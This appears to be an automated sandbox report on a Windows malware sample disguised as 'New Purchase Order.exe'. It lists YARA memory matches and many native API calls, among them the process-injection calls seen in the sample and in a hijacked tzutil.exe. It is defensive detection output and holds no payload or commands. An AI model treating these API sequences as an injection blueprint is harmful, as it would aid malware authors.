                Source: Yara matchFile source: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2610575297.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1946849090.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2611853715.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: New Purchase Order.exe
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0042C953 NtClose,3_2_0042C953
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882B60 NtClose,LdrInitializeThunk,3_2_01882B60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01882DF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01882C70
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018835C0 NtCreateMutant,LdrInitializeThunk,3_2_018835C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01884340 NtSetContextThread,3_2_01884340
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01884650 NtSuspendThread,3_2_01884650
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882B80 NtQueryInformationFile,3_2_01882B80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882BA0 NtEnumerateValueKey,3_2_01882BA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882BE0 NtQueryValueKey,3_2_01882BE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882BF0 NtAllocateVirtualMemory,3_2_01882BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882AB0 NtWaitForSingleObject,3_2_01882AB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882AD0 NtReadFile,3_2_01882AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882AF0 NtWriteFile,3_2_01882AF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882DB0 NtEnumerateKey,3_2_01882DB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882DD0 NtDelayExecution,3_2_01882DD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882D00 NtSetInformationFile,3_2_01882D00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882D10 NtMapViewOfSection,3_2_01882D10
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882D30 NtUnmapViewOfSection,3_2_01882D30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882CA0 NtQueryInformationToken,3_2_01882CA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882CC0 NtQueryVirtualMemory,3_2_01882CC0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882CF0 NtOpenProcess,3_2_01882CF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882C00 NtQueryInformationProcess,3_2_01882C00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882C60 NtCreateKey,3_2_01882C60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882F90 NtProtectVirtualMemory,3_2_01882F90
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882FA0 NtQuerySection,3_2_01882FA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882FB0 NtResumeThread,3_2_01882FB0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882FE0 NtCreateFile,3_2_01882FE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882F30 NtCreateSection,3_2_01882F30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882F60 NtCreateProcessEx,3_2_01882F60
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882E80 NtReadVirtualMemory,3_2_01882E80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882EA0 NtAdjustPrivilegesToken,3_2_01882EA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882EE0 NtQueueApcThread,3_2_01882EE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882E30 NtWriteVirtualMemory,3_2_01882E30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01883090 NtSetValueKey,3_2_01883090
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01883010 NtOpenDirectoryObject,3_2_01883010
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018839B0 NtGetContextThread,3_2_018839B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01883D10 NtOpenProcessToken,3_2_01883D10
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01883D70 NtOpenThread,3_2_01883D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB4340 NtSetContextThread,LdrInitializeThunk,8_2_02CB4340
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB4650 NtSuspendThread,LdrInitializeThunk,8_2_02CB4650
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2AD0 NtReadFile,LdrInitializeThunk,8_2_02CB2AD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2AF0 NtWriteFile,LdrInitializeThunk,8_2_02CB2AF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_02CB2BE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_02CB2BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_02CB2BA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2B60 NtClose,LdrInitializeThunk,8_2_02CB2B60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_02CB2EE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_02CB2E80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2FE0 NtCreateFile,LdrInitializeThunk,8_2_02CB2FE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2FB0 NtResumeThread,LdrInitializeThunk,8_2_02CB2FB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2F30 NtCreateSection,LdrInitializeThunk,8_2_02CB2F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_02CB2CA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2C60 NtCreateKey,LdrInitializeThunk,8_2_02CB2C60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_02CB2C70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2DD0 NtDelayExecution,LdrInitializeThunk,8_2_02CB2DD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_02CB2DF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_02CB2D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_02CB2D30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB35C0 NtCreateMutant,LdrInitializeThunk,8_2_02CB35C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB39B0 NtGetContextThread,LdrInitializeThunk,8_2_02CB39B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2AB0 NtWaitForSingleObject,8_2_02CB2AB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2B80 NtQueryInformationFile,8_2_02CB2B80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2EA0 NtAdjustPrivilegesToken,8_2_02CB2EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2E30 NtWriteVirtualMemory,8_2_02CB2E30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2F90 NtProtectVirtualMemory,8_2_02CB2F90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2FA0 NtQuerySection,8_2_02CB2FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2F60 NtCreateProcessEx,8_2_02CB2F60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2CC0 NtQueryVirtualMemory,8_2_02CB2CC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2CF0 NtOpenProcess,8_2_02CB2CF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2C00 NtQueryInformationProcess,8_2_02CB2C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2DB0 NtEnumerateKey,8_2_02CB2DB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB2D00 NtSetInformationFile,8_2_02CB2D00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB3090 NtSetValueKey,8_2_02CB3090
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB3010 NtOpenDirectoryObject,8_2_02CB3010
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB3D70 NtOpenThread,8_2_02CB3D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB3D10 NtOpenProcessToken,8_2_02CB3D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E9480 NtCreateFile,8_2_001E9480
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E95F0 NtReadFile,8_2_001E95F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E96E0 NtDeleteFile,8_2_001E96E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E9780 NtClose,8_2_001E9780
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E98E0 NtAllocateVirtualMemory,8_2_001E98E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D20EB80_2_00D20EB8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D273C80_2_00D273C8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D2A5480_2_00D2A548
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D208C10_2_00D208C1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D209BF0_2_00D209BF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D209010_2_00D20901
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D20ACC0_2_00D20ACC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D20A920_2_00D20A92
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D20A150_2_00D20A15
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D20BB90_2_00D20BB9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D20B6C0_2_00D20B6C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D20B1D0_2_00D20B1D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D20C180_2_00D20C18
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D22C300_2_00D22C30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D22C200_2_00D22C20
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D20D5B0_2_00D20D5B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D20D650_2_00D20D65
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_00D20D190_2_00D20D19
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_04DB32440_2_04DB3244
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_04DB9B400_2_04DB9B40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_04DBE8500_2_04DBE850
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_04DBE83F0_2_04DBE83F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_04DB15540_2_04DB1554
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_04DB55300_2_04DB5530
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_04DB9FAB0_2_04DB9FAB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_04DB39780_2_04DB3978
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_04DB39680_2_04DB3968
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_04DB9B310_2_04DB9B31
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_004189C33_2_004189C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0041021B3_2_0041021B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_004012203_2_00401220
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_004102233_2_00410223
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_004022DE3_2_004022DE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_004022E03_2_004022E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00416BCE3_2_00416BCE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00416BD33_2_00416BD3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_004104433_2_00410443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0040E4633_2_0040E463
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0040E5B33_2_0040E5B3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0040262C3_2_0040262C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_004026303_2_00402630
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00402F503_2_00402F50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0042EF233_2_0042EF23
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019041A23_2_019041A2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019101AA3_2_019101AA
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019081CC3_2_019081CC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018401003_2_01840100
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EA1183_2_018EA118
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D81583_2_018D8158
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E20003_2_018E2000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E3F03_2_0185E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019103E63_2_019103E6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190A3523_2_0190A352
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D02C03_2_018D02C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F02743_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019105913_2_01910591
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018505353_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FE4F63_2_018FE4F6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F44203_2_018F4420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019024463_2_01902446
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184C7C03_2_0184C7C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018747503_2_01874750
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018507703_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186C6E03_2_0186C6E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A03_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0191A9A63_2_0191A9A6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018669623_2_01866962
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018368B83_2_018368B8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E8F03_2_0187E8F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018528403_2_01852840
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185A8403_2_0185A840
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01906BD73_2_01906BD7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190AB403_2_0190AB40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184EA803_2_0184EA80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01868DBF3_2_01868DBF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184ADE03_2_0184ADE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185AD003_2_0185AD00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018ECD1F3_2_018ECD1F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0CB53_2_018F0CB5
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01840CF23_2_01840CF2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850C003_2_01850C00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CEFA03_2_018CEFA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01842FC83_2_01842FC8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185CFE03_2_0185CFE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01892F283_2_01892F28
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01870F303_2_01870F30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F2F303_2_018F2F30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C4F403_2_018C4F40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190CE933_2_0190CE93
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01862E903_2_01862E90
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190EEDB3_2_0190EEDB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190EE263_2_0190EE26
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850E593_2_01850E59
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185B1B03_2_0185B1B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0188516C3_2_0188516C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183F1723_2_0183F172
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0191B16B3_2_0191B16B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FF0CC3_2_018FF0CC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018570C03_2_018570C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190F0E03_2_0190F0E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019070E93_2_019070E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0189739A3_2_0189739A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190132D3_2_0190132D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183D34C3_2_0183D34C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018552A03_2_018552A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186B2C03_2_0186B2C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F12ED3_2_018F12ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018ED5B03_2_018ED5B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019075713_2_01907571
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190F43F3_2_0190F43F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018414603_2_01841460
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190F7B03_2_0190F7B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_019016CC3_2_019016CC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018956303_2_01895630
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E59103_2_018E5910
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018599503_2_01859950
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186B9503_2_0186B950
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018538E03_2_018538E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BD8003_2_018BD800
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186FB803_2_0186FB80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0188DBF93_2_0188DBF9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C5BF03_2_018C5BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190FB763_2_0190FB76
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018EDAAC3_2_018EDAAC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01895AA03_2_01895AA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F1AA33_2_018F1AA3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FDAC63_2_018FDAC6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01907A463_2_01907A46
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190FA493_2_0190FA49
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C3A6C3_2_018C3A6C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186FDC03_2_0186FDC0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01853D403_2_01853D40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01901D5A3_2_01901D5A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01907D733_2_01907D73
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190FCF23_2_0190FCF2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C9C323_2_018C9C32
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01851F923_2_01851F92
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190FFB13_2_0190FFB1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190FF093_2_0190FF09
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01859EB03_2_01859EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D002C08_2_02D002C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D202748_2_02D20274
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D403E68_2_02D403E6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C8E3F08_2_02C8E3F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3A3528_2_02D3A352
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D120008_2_02D12000
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D381CC8_2_02D381CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D341A28_2_02D341A2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D401AA8_2_02D401AA
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D081588_2_02D08158
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C701008_2_02C70100
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D1A1188_2_02D1A118
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C9C6E08_2_02C9C6E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C7C7C08_2_02C7C7C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CA47508_2_02CA4750
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C807708_2_02C80770
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D2E4F68_2_02D2E4F6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D324468_2_02D32446
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D244208_2_02D24420
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D405918_2_02D40591
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C805358_2_02C80535
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C7EA808_2_02C7EA80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D36BD78_2_02D36BD7
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3AB408_2_02D3AB40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CAE8F08_2_02CAE8F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C668B88_2_02C668B8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C8A8408_2_02C8A840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C828408_2_02C82840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C829A08_2_02C829A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D4A9A68_2_02D4A9A6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C969628_2_02C96962
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3EEDB8_2_02D3EEDB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3CE938_2_02D3CE93
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C92E908_2_02C92E90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C80E598_2_02C80E59
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3EE268_2_02D3EE26
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C72FC88_2_02C72FC8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C8CFE08_2_02C8CFE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CFEFA08_2_02CFEFA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CF4F408_2_02CF4F40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D22F308_2_02D22F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CC2F288_2_02CC2F28
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CA0F308_2_02CA0F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C70CF28_2_02C70CF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D20CB58_2_02D20CB5
